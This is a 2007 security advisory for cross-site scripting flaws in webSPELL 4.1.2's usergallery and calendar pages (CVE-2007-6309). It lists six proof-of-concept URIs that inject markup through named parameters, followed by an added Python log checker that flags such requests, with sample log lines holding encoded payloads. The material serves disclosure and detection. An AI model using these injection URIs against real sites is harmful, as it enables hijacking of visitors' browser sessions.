Title webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities
Published 2007-12-10-12:00AM
Updated 2008-01-03-02:10PM
Class Input Validation Error
CVE   CVE-2007-6309
Remote  Yes
Local  No
Credit  Brainhead is credited with the discovery of these vulnerabilities.
Vulnerable  webSPELL webSPELL 4.1.2
Not Vulnerable  
Code  Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI. The following proof-of-concept URIs are available:
http://www.example.com/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code]
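
Added example, not part of the original advisory or of webSPELL: a log check that flags requests to index.php in which one of the parameters listed above carries HTML metacharacters, including nested percent-encoding. The combined log format, the /ws/ path, the MARKER value and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters named in the advisory, keyed by the value of `site`.
WATCHED = {"usergallery": {"galleryID"},
           "calendar": {"upID", "tag", "month", "userID", "year"}}
# Characters that let a value break out of an HTML attribute or open a tag.
HTML_META = re.compile(r"[\"'<>]")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Constructed sample lines: one benign, one encoded once, one encoded twice.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2007:10:00:00 +0000] "GET /ws/index.php?site=calendar&action=announce&month=12&year=2007 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [10/Dec/2007:10:00:05 +0000] "GET /ws/index.php?site=calendar&action=announce&upID=%22%3EMARKER HTTP/1.1" 200 5200',
    '192.0.2.12 - - [10/Dec/2007:10:00:09 +0000] "GET /ws/index.php?site=usergallery&action=upload&galleryID=%2522%253EMARKER HTTP/1.1" 200 4800',
]


def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2522) for a bounded number of rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return sorted names of watched parameters carrying HTML metacharacters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/index.php"):
        return []
    query = parse_qs(url.query, keep_blank_values=True)
    hits = set()
    for site in query.get("site", []):
        for name in WATCHED.get(site, ()):
            for value in query.get(name, []):
                if HTML_META.search(decode_fully(value)):
                    hits.add(name)
    return sorted(hits)


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line), line.split('"')[1])
```

A hit only shows that such a request reached the server; whether the value was reflected unencoded depends on the installed webSPELL version.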
Copyright 2007, SecurityDot